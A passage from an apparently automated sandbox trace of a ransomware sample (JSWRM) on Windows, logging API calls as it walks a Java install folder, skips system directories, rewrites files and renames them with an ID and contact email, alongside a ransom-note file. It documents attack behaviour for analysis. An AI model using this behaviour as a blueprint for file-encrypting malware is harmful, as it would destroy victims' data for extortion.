Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0070.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0070.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0070.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0070.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0070.659] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x99, dwReserved0=0x60002, dwReserved1=0x20933c, cFileName="win32_MoveNoDrop32x32.gif", cAlternateFileName="WIE2D6~1.GIF")) returned 1 [0070.659] lstrcmpiW (lpString1="win32_MoveNoDrop32x32.gif", lpString2=".") returned 1 [0070.659] lstrcmpiW (lpString1="win32_MoveNoDrop32x32.gif", lpString2="..") returned 1 [0070.659] lstrcmpiW (lpString1="win32_MoveNoDrop32x32.gif", lpString2="...") returned 1 [0070.659] lstrcmpiW (lpString1="win32_MoveNoDrop32x32.gif", lpString2="windows") returned -1 [0070.659] lstrcmpiW (lpString1="win32_MoveNoDrop32x32.gif", lpString2="recovery") returned 1 [0070.659] lstrcmpiW (lpString1="win32_MoveNoDrop32x32.gif", lpString2="perflogs") returned 1 [0070.660] lstrcmpiW (lpString1="win32_MoveNoDrop32x32.gif", lpString2="documents and settings") returned 1 [0070.660] lstrcmpiW (lpString1="win32_MoveNoDrop32x32.gif", lpString2="$RECYCLE.BIN") returned 1 [0070.660] lstrcmpiW (lpString1="win32_MoveNoDrop32x32.gif", lpString2="system volume information") returned 1 [0070.660] lstrcmpiW (lpString1="win32_MoveNoDrop32x32.gif", lpString2="msocache") returned 1 [0070.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0070.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_MoveNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0070.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0070.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_MoveNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x241178, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_MoveNoDrop32x32.gif", lpUsedDefaultChar=0x0) returned 25 [0070.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0070.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0070.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_MoveNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0070.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0070.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_MoveNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x2413a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_MoveNoDrop32x32.gif", lpUsedDefaultChar=0x0) returned 25 [0070.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0070.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0070.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0070.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0070.660] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0070.660] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=153) returned 1 [0070.660] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.660] ReadFile (in: hFile=0x45c, lpBuffer=0x23b400, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x23b400*, lpNumberOfBytesRead=0x345e534*=0x90, lpOverlapped=0x0) returned 1 [0070.661] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.661] WriteFile (in: hFile=0x45c, lpBuffer=0x23b400*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x23b400*, lpNumberOfBytesWritten=0x345e530*=0x90, lpOverlapped=0x0) returned 1 [0070.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.662] CloseHandle (hObject=0x45c) returned 1 [0070.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0070.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0070.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0070.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0070.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0070.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0070.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.662] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0070.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0070.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0070.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0070.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0070.663] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x99, dwReserved0=0x60002, dwReserved1=0x20933c, cFileName="win32_MoveNoDrop32x32.gif", cAlternateFileName="WIE2D6~1.GIF")) returned 0 [0070.663] FindClose (in: hFindFile=0x231c40 | out: hFindFile=0x231c40) returned 1 [0070.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0070.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0070.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0070.663] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20b71812, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x20b71812, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x20b71812, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0070.663] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0070.663] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0070.663] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0070.663] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0070.663] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0070.663] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0070.663] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0070.663] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0070.663] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0070.663] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0070.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0070.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0070.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0070.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0070.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0070.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0070.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0070.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0070.664] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20b71812, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x20b71812, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x20b71812, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0070.664] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0070.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0070.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0070.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0070.664] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x38, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="javafx.properties", cAlternateFileName="JAVAFX~1.PRO")) returned 1 [0070.664] lstrcmpiW (lpString1="javafx.properties", lpString2=".") returned 1 [0070.664] lstrcmpiW (lpString1="javafx.properties", lpString2="..") returned 1 [0070.664] lstrcmpiW (lpString1="javafx.properties", lpString2="...") returned 1 [0070.664] lstrcmpiW (lpString1="javafx.properties", lpString2="windows") returned -1 [0070.664] lstrcmpiW (lpString1="javafx.properties", lpString2="recovery") returned -1 [0070.664] lstrcmpiW (lpString1="javafx.properties", lpString2="perflogs") returned -1 [0070.664] lstrcmpiW (lpString1="javafx.properties", lpString2="documents and settings") returned 1 [0070.664] lstrcmpiW (lpString1="javafx.properties", lpString2="$RECYCLE.BIN") returned 1 [0070.664] lstrcmpiW (lpString1="javafx.properties", lpString2="system volume information") returned -1 [0070.664] lstrcmpiW (lpString1="javafx.properties", lpString2="msocache") returned -1 [0070.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx.properties", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0070.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx.properties", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javafx.properties", lpUsedDefaultChar=0x0) returned 17 [0070.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx.properties", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0070.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx.properties", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javafx.properties", lpUsedDefaultChar=0x0) returned 17 [0070.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0070.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0070.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0070.665] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javafx.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.665] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=56) returned 1 [0070.665] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.665] ReadFile (in: hFile=0x454, lpBuffer=0x22d260, nNumberOfBytesToRead=0x30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x22d260*, lpNumberOfBytesRead=0x345ec04*=0x30, lpOverlapped=0x0) returned 1 [0070.666] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.666] WriteFile (in: hFile=0x454, lpBuffer=0x22d260*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x22d260*, lpNumberOfBytesWritten=0x345ec00*=0x30, lpOverlapped=0x0) returned 1 [0070.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.666] CloseHandle (hObject=0x454) returned 1 [0070.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0070.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0070.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0070.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0070.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0070.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f280 [0070.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.667] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javafx.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javafx.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0070.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0070.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0070.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0070.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0070.667] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8e40a9d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8e40a9d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8e66d0e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xe6827, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="javaws.jar", cAlternateFileName="")) returned 1 [0070.667] lstrcmpiW (lpString1="javaws.jar", lpString2=".") returned 1 [0070.667] lstrcmpiW (lpString1="javaws.jar", lpString2="..") returned 1 [0070.667] lstrcmpiW (lpString1="javaws.jar", lpString2="...") returned 1 [0070.667] lstrcmpiW (lpString1="javaws.jar", lpString2="windows") returned -1 [0070.667] lstrcmpiW (lpString1="javaws.jar", lpString2="recovery") returned -1 [0070.667] lstrcmpiW (lpString1="javaws.jar", lpString2="perflogs") returned -1 [0070.668] lstrcmpiW (lpString1="javaws.jar", lpString2="documents and settings") returned 1 [0070.668] lstrcmpiW (lpString1="javaws.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.668] lstrcmpiW (lpString1="javaws.jar", lpString2="system volume information") returned -1 [0070.668] lstrcmpiW (lpString1="javaws.jar", lpString2="msocache") returned -1 [0070.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0070.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.jar", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0070.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.jar", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javaws.jar", lpUsedDefaultChar=0x0) returned 10 [0070.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0070.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0070.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.jar", cchWideChar=10, 